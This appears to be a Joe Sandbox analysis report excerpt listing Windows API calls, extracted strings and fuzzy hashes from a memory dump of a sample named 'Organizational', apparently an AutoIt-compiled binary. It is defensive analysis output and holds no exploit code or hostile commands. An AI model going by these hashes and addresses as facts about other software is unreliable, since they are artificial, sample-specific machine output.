                                                          • GetLocalTime.KERNEL32(?), ref: 002BE31F
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 002BE32F
                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002BE33B
                                                          • __wsplitpath.LIBCMT ref: 002BE399
                                                          • _wcscat.LIBCMT ref: 002BE3B1
                                                          • _wcscat.LIBCMT ref: 002BE3C3
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002BE3D8
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 002BE3EC
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 002BE41E
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 002BE43F
                                                          • _wcscpy.LIBCMT ref: 002BE44B
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002BE48A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                          • String ID: *.*
                                                          • API String ID: 3566783562-438819550
                                                          • Opcode ID: 9123dd72545cf96f0b8957d8018f90a875ae47cf71687c27edf97fcae3a1d954
                                                          • Instruction ID: fe9ca01df818fbd4835e2f3da7d5e8626f5bfee4d36656b8e75e656cb7183c8f
                                                          • Opcode Fuzzy Hash: 9123dd72545cf96f0b8957d8018f90a875ae47cf71687c27edf97fcae3a1d954
                                                          • Instruction Fuzzy Hash: 396158725242459FCB10EF60C884AEEB3E8FF88354F04891EF98987251DB35E959CF96
                                                          APIs
                                                            • Part of subcall function 00251F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00252412,?,00000000,?,?,?,?,00251AA7,00000000,?), ref: 00251F76
                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 002524AF
                                                          • KillTimer.USER32(-00000001,?,?,?,?,00251AA7,00000000,?,?,00251EBE,?,?), ref: 0025254A
                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 0028BFE7
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00251AA7,00000000,?,?,00251EBE,?,?), ref: 0028C018
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00251AA7,00000000,?,?,00251EBE,?,?), ref: 0028C02F
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00251AA7,00000000,?,?,00251EBE,?,?), ref: 0028C04B
                                                          • DeleteObject.GDI32(00000000), ref: 0028C05D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                          • String ID: h.
                                                          • API String ID: 641708696-3029464332
                                                          • Opcode ID: 867b28e3ecd561778af183dc87a597064771d0c030fac5b1d604349f77886f57
                                                          • Instruction ID: 06e6f1db53d92706a1f817aeaf2d0bcab84919fa564c159bf7b78e7eb65c5328
                                                          • Opcode Fuzzy Hash: 867b28e3ecd561778af183dc87a597064771d0c030fac5b1d604349f77886f57
                                                          • Instruction Fuzzy Hash: 1F61CF34135602DFCB26AF14DD8CB7677B1FB45312F148528E8425A9E0C3B0A8A9DFA4
                                                          APIs
                                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002BA2C2
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002BA2E3
                                                          • __swprintf.LIBCMT ref: 002BA33C
                                                          • __swprintf.LIBCMT ref: 002BA355
                                                          • _wprintf.LIBCMT ref: 002BA3FC
                                                          • _wprintf.LIBCMT ref: 002BA41A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 311963372-3080491070
                                                          • Opcode ID: 3802b61dd3cec9d3183a30ac6121046b0dbee1f466c8c7d8fc0ce93f198255c5
                                                          • Instruction ID: 38ed614e7bfee708deae4ccad3d10161030fab1caf505935055cbfbcaee7f625
                                                          • Opcode Fuzzy Hash: 3802b61dd3cec9d3183a30ac6121046b0dbee1f466c8c7d8fc0ce93f198255c5
                                                          • Instruction Fuzzy Hash: 5151AD71921249AACF15EBE0CD96EEEB7B8AF04340F144165F405A2092EB712FB9DF61
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,0029F8B8,00000001,0000138C,00000001,00000000,00000001,?,002C3FF9,00000000), ref: 002B009A
                                                          • LoadStringW.USER32(00000000,?,0029F8B8,00000001), ref: 002B00A3
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                          • GetModuleHandleW.KERNEL32(00000000,00317310,?,00000FFF,?,?,0029F8B8,00000001,0000138C,00000001,00000000,00000001,?,002C3FF9,00000000,00000001), ref: 002B00C5
                                                          • LoadStringW.USER32(00000000,?,0029F8B8,00000001), ref: 002B00C8
                                                          • __swprintf.LIBCMT ref: 002B0118
                                                          • __swprintf.LIBCMT ref: 002B0129
                                                          • _wprintf.LIBCMT ref: 002B01D2
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002B01E9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                          • API String ID: 984253442-2268648507
                                                          • Opcode ID: 61cfb6c6073137a41be2f276c664bb0965b1111cfd1530357d2efaa9d3a6e6d0
                                                          • Instruction ID: 97a5d6818977a93d45293945e8eb6822f6f86be5299c5f95a217a4ea4038890d
                                                          • Opcode Fuzzy Hash: 61cfb6c6073137a41be2f276c664bb0965b1111cfd1530357d2efaa9d3a6e6d0
                                                          • Instruction Fuzzy Hash: 0B418E72811259AACF15EBE0DD96DEEB37CAF14341F140165F505B2092DA306FB9CFA1
                                                          APIs
                                                            • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
                                                            • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
                                                          • CharLowerBuffW.USER32(?,?), ref: 002BAA0E
                                                          • GetDriveTypeW.KERNEL32 ref: 002BAA5B
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002BAAA3
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002BAADA
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002BAB08
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                          • API String ID: 2698844021-4113822522
                                                          • Opcode ID: 6b2bf9cafb1c99b933b40a3d5a30af641b3f1d4ee8653881c441672a88bd171b
                                                          • Instruction ID: 94dfe4d57a5346fa8b03eb78fc56d5ca1264e8431b66a82e2ec4685b2aa606f1
                                                          • Opcode Fuzzy Hash: 6b2bf9cafb1c99b933b40a3d5a30af641b3f1d4ee8653881c441672a88bd171b
                                                          • Instruction Fuzzy Hash: B2517B711243059FC300EF20C8919AAB7F4FF98758F14896DF895972A1DB31AE69CF92
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002BA852
                                                          • __swprintf.LIBCMT ref: 002BA874
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 002BA8B1
                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 002BA8D6
                                                          • _memset.LIBCMT ref: 002BA8F5
                                                          • _wcsncpy.LIBCMT ref: 002BA931
                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 002BA966
                                                          • CloseHandle.KERNEL32(00000000), ref: 002BA971
                                                          • RemoveDirectoryW.KERNEL32(?), ref: 002BA97A
                                                          • CloseHandle.KERNEL32(00000000), ref: 002BA984
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                          • String ID: :$\$\??\%s
                                                          • API String ID: 2733774712-3457252023
                                                          • Opcode ID: deba502f54c5d53a2b8327a4ec43bc0c0844b0ab14da3e9fd9f0ed6a3fda667c
                                                          • Instruction ID: 0e8d12ba7f896e2e6429017e6cf68b99e2cb9f3e70f441cc607e7f0fec0cbfdf
                                                          • Opcode Fuzzy Hash: deba502f54c5d53a2b8327a4ec43bc0c0844b0ab14da3e9fd9f0ed6a3fda667c
                                                          • Instruction Fuzzy Hash: 5C31D47155014AABDB21DFA0DC88FEF73BCEF88740F1041B6F909D6060E77096958B25
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,002D982C,?,?), ref: 002DC0C8
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,002D982C,?,?,00000000,?), ref: 002DC0DF
                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,002D982C,?,?,00000000,?), ref: 002DC0EA
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,002D982C,?,?,00000000,?), ref: 002DC0F7
                                                          • GlobalLock.KERNEL32(00000000), ref: 002DC100
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,002D982C,?,?,00000000,?), ref: 002DC10F
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 002DC118
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,002D982C,?,?,00000000,?), ref: 002DC11F
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002D982C,?,?,00000000,?), ref: 002DC130
                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,002E3C7C,?), ref: 002DC149
                                                          • GlobalFree.KERNEL32(00000000), ref: 002DC159
                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 002DC17D
                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 002DC1A8
                                                          • DeleteObject.GDI32(00000000), ref: 002DC1D0
                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002DC1E6
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                          • String ID:
                                                          • API String ID: 3840717409-0
                                                          • Opcode ID: 61348e2a0fa5a44e45ba119e5fd13079c1e1081ca089d43657a3855f38fb0636
                                                          • Instruction ID: 4c41ceb5c90eef1d492128438ecef0acead2ff6ed85e91530aaa01347d745750
                                                          • Opcode Fuzzy Hash: 61348e2a0fa5a44e45ba119e5fd13079c1e1081ca089d43657a3855f38fb0636
                                                          • Instruction Fuzzy Hash: 50415A71540249EFCB118F65ECCCEAE7BB8EB89711F104059F909EB260CBB19D82DB60
                                                          APIs
                                                            • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002DC8A4
                                                          • GetFocus.USER32 ref: 002DC8B4
                                                          • GetDlgCtrlID.USER32(00000000), ref: 002DC8BF
                                                          • _memset.LIBCMT ref: 002DC9EA
                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 002DCA15
                                                          • GetMenuItemCount.USER32(?), ref: 002DCA35
                                                          • GetMenuItemID.USER32(?,00000000), ref: 002DCA48
                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 002DCA7C
                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 002DCAC4
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002DCAFC
                                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 002DCB31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                          • String ID: 0
                                                          • API String ID: 1296962147-4108050209
                                                          • Opcode ID: 168e25b8fff31e13ee94a9e9f72cfd29c6dc76f2d969d0bff79cd667fe480161
                                                          • Instruction ID: 0b6f86d0e67dcd3a6d4ec68370b762c5c629fb2c125d7154c9b4db95c376d50e
                                                          • Opcode Fuzzy Hash: 168e25b8fff31e13ee94a9e9f72cfd29c6dc76f2d969d0bff79cd667fe480161
                                                          • Instruction Fuzzy Hash: F9816A702283429FD711CF14D889AAABBE8FB88314F20452EF98597391C770DD65CFA2
                                                          APIs
                                                            • Part of subcall function 002A8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002A8E3C
                                                            • Part of subcall function 002A8E20: GetLastError.KERNEL32(?,002A8900,?,?,?), ref: 002A8E46
                                                            • Part of subcall function 002A8E20: GetProcessHeap.KERNEL32(00000008,?,?,002A8900,?,?,?), ref: 002A8E55
                                                            • Part of subcall function 002A8E20: HeapAlloc.KERNEL32(00000000,?,002A8900,?,?,?), ref: 002A8E5C
                                                            • Part of subcall function 002A8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002A8E73
                                                            • Part of subcall function 002A8EBD: GetProcessHeap.KERNEL32(00000008,002A8916,00000000,00000000,?,002A8916,?), ref: 002A8EC9
                                                            • Part of subcall function 002A8EBD: HeapAlloc.KERNEL32(00000000,?,002A8916,?), ref: 002A8ED0
                                                            • Part of subcall function 002A8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002A8916,?), ref: 002A8EE1
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002A8B2E
                                                          • _memset.LIBCMT ref: 002A8B43
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002A8B62
                                                          • GetLengthSid.ADVAPI32(?), ref: 002A8B73
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 002A8BB0
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002A8BCC
                                                          • GetLengthSid.ADVAPI32(?), ref: 002A8BE9
                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002A8BF8
                                                          • HeapAlloc.KERNEL32(00000000), ref: 002A8BFF
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002A8C20
                                                          • CopySid.ADVAPI32(00000000), ref: 002A8C27
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002A8C58
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002A8C7E
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002A8C92
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                          • String ID:
                                                          • API String ID: 3996160137-0
                                                          • Opcode ID: cf879fa1807379a672eb486fac7dfec12b23619bdb1e025e1dcb21e8a0145a58
                                                          • Instruction ID: b1391c1ba70754b97c903ce9fdf75fa168726b3196d750f3b973ea6aecb8886e
                                                          • Opcode Fuzzy Hash: cf879fa1807379a672eb486fac7dfec12b23619bdb1e025e1dcb21e8a0145a58
                                                          • Instruction Fuzzy Hash: CD615A7191020AAFDF14DFA0DC88EAEBB79FF05310F04815AF915AA290DF719A25CF60
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 002C7A79
                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 002C7A85
                                                          • CreateCompatibleDC.GDI32(?), ref: 002C7A91
                                                          • SelectObject.GDI32(00000000,?), ref: 002C7A9E
                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 002C7AF2
                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 002C7B2E
                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 002C7B52
                                                          • SelectObject.GDI32(00000006,?), ref: 002C7B5A
                                                          • DeleteObject.GDI32(?), ref: 002C7B63
                                                          • DeleteDC.GDI32(00000006), ref: 002C7B6A
                                                          • ReleaseDC.USER32(00000000,?), ref: 002C7B75
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                          • String ID: (
                                                          • API String ID: 2598888154-3887548279
                                                          • Opcode ID: 9b4ca373718dcf052696e3d3c6d14e67dc08dea40e5b2bb4e84b8007c6c61842
                                                          • Instruction ID: 3763337f57b95770b8cbdf2d9f34e676f944971b9b1348b763b27a2ac39577ad
                                                          • Opcode Fuzzy Hash: 9b4ca373718dcf052696e3d3c6d14e67dc08dea40e5b2bb4e84b8007c6c61842
                                                          • Instruction Fuzzy Hash: 9D516771954209EFCB14CFA8DC88FAEBBB9EF48310F14851DF94AAB210D771A9518F60
                                                          APIs
                                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002BA4D4
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 002BA4F6
                                                          • __swprintf.LIBCMT ref: 002BA54F
                                                          • __swprintf.LIBCMT ref: 002BA568
                                                          • _wprintf.LIBCMT ref: 002BA61E
                                                          • _wprintf.LIBCMT ref: 002BA63C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 311963372-2391861430
                                                          • Opcode ID: 6c3c8453394acb1037ec04dfe4665e672dc3187baf49f0b1735285aaaad4dea5
                                                          • Instruction ID: 40ef283b0e0127656bc4913daee0e2b41adedd9d5ac7ea18e92cbe6786212846
                                                          • Opcode Fuzzy Hash: 6c3c8453394acb1037ec04dfe4665e672dc3187baf49f0b1735285aaaad4dea5
                                                          • Instruction Fuzzy Hash: 9551BF71821149ABCF15EBE0CD86EEEB778AF04340F184165F505A20A2DB312FB9CF61
                                                          APIs
                                                            • Part of subcall function 002B951A: __time64.LIBCMT ref: 002B9524
                                                            • Part of subcall function 00264A8C: _fseek.LIBCMT ref: 00264AA4
                                                          • __wsplitpath.LIBCMT ref: 002B97EF
                                                            • Part of subcall function 0027431E: __wsplitpath_helper.LIBCMT ref: 0027435E
                                                          • _wcscpy.LIBCMT ref: 002B9802
                                                          • _wcscat.LIBCMT ref: 002B9815
                                                          • __wsplitpath.LIBCMT ref: 002B983A
                                                          • _wcscat.LIBCMT ref: 002B9850
                                                          • _wcscat.LIBCMT ref: 002B9863
                                                            • Part of subcall function 002B9560: _memmove.LIBCMT ref: 002B9599
                                                            • Part of subcall function 002B9560: _memmove.LIBCMT ref: 002B95A8
                                                          • _wcscmp.LIBCMT ref: 002B97AA
                                                            • Part of subcall function 002B9CF1: _wcscmp.LIBCMT ref: 002B9DE1
                                                            • Part of subcall function 002B9CF1: _wcscmp.LIBCMT ref: 002B9DF4
                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002B9A0D
                                                          • _wcsncpy.LIBCMT ref: 002B9A80
                                                          • DeleteFileW.KERNEL32(?,?), ref: 002B9AB6
                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002B9ACC
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002B9ADD
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002B9AEF
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
